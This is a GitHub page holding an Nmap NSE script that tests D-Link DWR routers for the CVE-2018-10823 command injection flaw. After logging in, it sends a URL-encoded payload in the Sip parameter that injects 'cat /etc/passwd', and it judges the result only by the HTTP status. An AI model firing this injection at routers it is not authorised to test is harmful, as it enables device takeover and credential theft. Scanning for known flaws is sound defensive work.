-
Notifications
You must be signed in to change notification settings - Fork 2
/
1377-http-vuln-cve2018-10823.nse
153 lines (132 loc) · 4.85 KB
/
1377-http-vuln-cve2018-10823.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
local http = require 'http'
local shortport = require 'shortport'
local stdnse = require 'stdnse'
local string = require 'string'
local vulns = require 'vulns'
description = [[
Shell command injection vulnerability on D-Link routers:
- DWR-116 through 1.06,
- DWR-512 through 2.02,
- DWR-712 through 2.02,
- DWR-912 through 2.02,
- DWR-921 through 2.02,
- DWR-111 through 1.01,
- and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command
into the chkisg.htm page Sip parameter. This allows for full control over the device
internals.
Can be combined with CVE-2018-10822 or CVE-2018-10824 in order to discover the username
and password. Then, you can pass the credentials to this script, in order to authenticate
prior to testing the actual vulnerability.
The script attempts a GET HTTP request in order to authenticate and then attempts
a second GET HTTP request to test the vulnerability against a target.
References:
* https://seclists.org/fulldisclosure/2018/Oct/36
* https://sploit.tech/2018/10/12/D-Link.html
]]
---
-- @usage nmap --script http-vuln-cve2018-10823 --script-args "un=admin,pw=thepassword" -p 80,8080 <target>
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-vuln-cve2018-10823:
-- | VULNERABLE:
-- | D-Link routers shell command injection vulnerability
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2018-10823
-- | Risk factor: Critical CVSSv3: 9.1 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
-- | Shell command injection vulnerability on D-Link routers.
-- |
-- | Disclosure date: 2018-10-12
-- | References:
-- | https://seclists.org/fulldisclosure/2018/Oct/36
-- |_ https://sploit.tech/2018/10/12/D-Link.html
--
-- @xmloutput
-- <table key='2018-10823'>
-- <elem key='title'>D-Link routers shell command injection vulnerability</elem>
-- <elem key='state'>VULNERABLE</elem>
-- <table key='ids'>
-- <elem>CVE:CVE-2018-10823</elem>
-- </table>
-- <table key='scores'>
-- <elem key='CVSSv3'>9.1 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)</elem>
-- </table>
-- <table key='description'>
-- <elem>Shell command injection vulnerability on D-Link routers.</elem>
-- </table>
-- <table key='dates'>
-- <table key='disclosure'>
-- <elem key='day'>12</elem>
-- <elem key='month'>10</elem>
-- <elem key='year'>2018</elem>
-- </table>
-- </table>
-- <elem key='disclosure'>2018-10-12</elem>
-- <table key='check_results'>
-- </table>
-- <table key='refs'>
-- <elem>https://seclists.org/fulldisclosure/2018/Oct/36</elem>
-- <elem>https://sploit.tech/2018/10/12/D-Link.html</elem>
-- </table>
-- </table>
--
---
author = 'Kostas Milonas'
license = 'Same as Nmap--See https://nmap.org/book/man-legal.html'
categories = {'vuln', 'safe'}
portrule = shortport.http
local function login(host, port, un, pw)
-- Make a request to the login URL, with the given credentials
local uri = string.format('/log/in?un=%s&pw=%s&rd=/uir/syslog.htm&rd2=/uir/wanst.htm&Nrd=1', un, pw)
local response = http.get(host, port, uri, { redirect_ok = true, no_cache = true })
-- Check if the response contains any message that indicates a failure
if not http.response_contains(response, 'Login fail') and not http.response_contains(response, 'Password is incorrect.') then
stdnse.debug1(string.format('Logged in as "%s" with password "%s".', un, pw))
return true
end
return false
end
action = function(host, port)
local vuln_table = {
title = 'D-Link routers shell command injection vulnerability',
IDS = {CVE = 'CVE-2018-10823'},
risk_factor = 'Critical',
scores = {
CVSSv3 = '9.1 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)',
},
description = [[
Shell command injection vulnerability on D-Link routers.
]],
references = {
'https://seclists.org/fulldisclosure/2018/Oct/36',
'https://sploit.tech/2018/10/12/D-Link.html'
},
dates = {
disclosure = {year = '2018', month = '10', day = '12'},
},
check_results = {},
extra_info = {}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
vuln_table.state = vulns.STATE.NOT_VULN
-- Get the script arguments, username and password
local un = stdnse.get_script_args('un')
local pw = stdnse.get_script_args('pw')
-- Attempt login
local login_success = login(host, port, un, pw)
-- Login failed
if not login_success then
return vuln_report:make_output(vuln_table)
end
-- The vulnerable route
local uri = '/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd'
stdnse.debug1('Testing URI: %s', uri)
-- Test the vulnerability
local response = http.get(host, port, uri, { redirect_ok = false, no_cache = true })
if response.status == 200 then
stdnse.debug1('Vulnerability found!')
vuln_table.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln_table)
end